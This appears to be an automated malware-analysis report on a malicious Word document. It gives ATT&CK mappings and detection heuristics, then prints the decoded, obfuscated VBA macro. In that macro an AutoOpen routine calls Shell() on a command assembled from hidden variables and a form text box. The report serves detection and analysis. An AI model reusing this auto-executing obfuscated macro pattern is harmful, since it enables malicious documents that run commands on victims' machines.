Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro is present and the 'Shell()' function is called, indicating an attempt to execute arbitrary commands. This is a common technique for downloading and executing further stages of malware. The specific functionality of the VBA script is heavily obfuscated, preventing a more detailed analysis of its exact actions.
Heuristics (7)
- ClamAV: Doc.Malware.Generic-6791609-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Generic-6791609-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5971 bytes |
SHA-256: e2251e5f96180f8f6a752173d0db1b6e164d073a2e6bd4cb928ed37d7fb6beb0

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "L69789720701213"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
l848 = "M6740"
v6329 = "K6660"
T256 = "Y9744"
s1045119
i8734 = "c788"
J3341 = "E378"
U0717 = "L6466"
End Sub
Attribute VB_Name = "d535950937703"
Function s1045119()
On Error Resume Next
Select Case U749
Case 543
L593 = r087
D7791 = Log(o7733)
P1171 = p277
Case 369
d486 = p271
t088 = CBool(r983)
z429 = Rnd(p880 / Hex(Q432 * k822 - H7932 / Int(174)) * 835 - 294)
End Select
w3952 = 454 - 183
Set w571 = n686
Select Case I016
Case 342
N4158 = B1729
i637 = Log(q341)
K1146 = n7367
Case 565
v200 = S8828
J816 = CBool(N4054)
D541 = Rnd(N003 / Hex(F245 * s313 - A373 / Int(788)) * 694 - 235)
End Select
z382 = 54 - 717
Set X701 = q3691
Select Case J2965
Case 862
a5778 = c021
i3882 = Log(R6004)
p501 = u627
Case 816
A5688 = P6533
P951 = CBool(L097)
N928 = Rnd(P260 / Hex(r5836 * i875 - w6472 / Int(769)) * 858 - 588)
End Select
j0292 = 707 - 553
Set a0504 = L923
Select Case E3704
Case 847
F112 = r9501
K124 = Log(k5455)
k169 = v4586
Case 19
H756 = h1961
U158 = CBool(z5150)
P1693 = Rnd(F5362 / Hex(A7327 * R6870 - m129 / Int(471)) * 273 - 468)
End Select
G3450 = 16 - 374
Set n196 = H513
h323333912 = Array(M0030391, i637107329, d58358, Interaction.Shell(("" + v5804520 + Q73263 + Z34707 + L69789720701213.TextBox1) + H92859 + z93782 + J597939 + V37335, 58 - 58), k36488, H400255, N44599)
Select Case Y2304
Case 225
q608 = W471
L9546 = Log(s6158)
v346 = w043
Case 752
U7614 = f3321
i079 = CBool(R4483)
h7584 = Rnd(j865 / Hex(D716 * n5269 - p8651 / Int(450)) * 975 - 881)
End Select
F290 = 378 - 894
Set P065 = w6909
Select Case z4962
Case 930
L245 = f834
t520 = Log(W3465)
p962 = S102
Case 749
P4799 = H187
t2717 = CBool(w636)
v548 = Rnd(u384 / Hex(T129 * i613 - i9105 / Int(544)) * 392 - 731)
End Select
z6639 = 430 - 186
Set D1381 = c515
Select Case M0838
Case 474
D653 = m655
Z008 = Log(p777)
a9685 = l0483
Case 717
m565 = j615
N528 = CBool(p227)
k921 = Rnd(r5171 / Hex(F8534 * T5117 - X343 / Int(788)) * 693 - 113)
End Select
f778 = 857 - 245
Set o4264 = k277
Select Case q6033
Case 556
z1741 = i638
C419 = Log(L6766)
I0432 = c7098
Case 933
f752 = P5559
p7098 = CBool(b0429)
w8390 = Rnd(n6359 / Hex(z842 * H471 - Z5979 / Int(196)) * 281 - 789)
End Select
z8054 = 239 - 455
Set n846 = o890
End Function
Attribute VB_Name = "n76019893674602"
Attribute VB_Name = "n41472953"
Attribute VB_Name = "E8630250278168"
Attribute VB_Name = "X3956860277257"
Attribute VB_Name = "G086054562451"
Attribute VB_Name = "i24535324272"
Attribute VB_Name = "Y52096008"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Custom
... (truncated)